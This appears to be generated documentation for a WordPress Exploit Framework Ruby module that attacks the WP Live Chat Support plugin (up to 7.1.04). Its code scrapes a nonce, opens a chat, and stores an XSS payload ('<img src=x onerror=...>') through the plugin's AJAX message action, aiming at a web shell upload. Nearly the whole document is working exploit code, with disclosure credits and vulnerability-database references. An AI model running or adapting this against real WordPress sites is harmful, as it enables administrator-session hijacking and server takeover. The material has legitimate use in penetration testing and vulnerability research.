class Wpxf::Exploit::WpLiveChatSupportStoredXssShellUpload
Attributes
chat_id[RW]
nonce[RW]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'WP Live Chat Support <= 7.1.04 Stored XSS Shell Upload', author: [ 'Omaid Faizyar', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8880'], ['URL', 'https://github.com/CodeCabin/wp-live-chat-support/issues/358'] ], date: 'Jul 20 2017' ) register_options([ StringOption.new( name: 'chat_name', desc: 'The name to use in the live chat', required: true ), StringOption.new( name: 'chat_email', desc: 'The e-mail address to use in the live chat', required: true ) ]) end
Public Instance Methods
before_store()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 66 def before_store emit_info 'Acquiring a security token...' self.nonce = find_nonce if nonce.nil? emit_error 'Failed to acquire a nonce' return false end emit_info 'Initiating a new live chat...' self.chat_id = initiate_chat(nonce) if chat_id.nil? emit_error 'Failed to start a live chat' return false end true end
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 36 def check check_plugin_version_from_changelog('wp-live-chat-support', 'readme.txt', '7.1.05') end
find_nonce()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 44 def find_nonce res = execute_get_request(url: full_uri) return nil unless res && res.code == 200 res.body.match(/wplc_nonce\s=\s"(.+?)";/)[1] end
initiate_chat(nonce)
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 51 def initiate_chat(nonce) res = execute_post_request( url: wordpress_url_admin_ajax, body: { 'action' => 'wplc_start_chat', 'security' => nonce, 'name' => datastore['chat_name'], 'email' => datastore['chat_email'] } ) return nil unless res && res.code == 200 res.body.strip.to_i end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 85 def store_script execute_post_request( url: wordpress_url_admin_ajax, body: { 'action' => 'wplc_user_send_msg', 'security' => nonce, 'cid' => chat_id, 'msg' => "#{Utility::Text.rand_alpha(1)}</title><img src=x onerror=#{xss_ascii_encoded_include_script}>" } ) end
vulnerable_page()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_live_chat_support_stored_xss_shell_upload.rb, line 40 def vulnerable_page 'the live chat window' end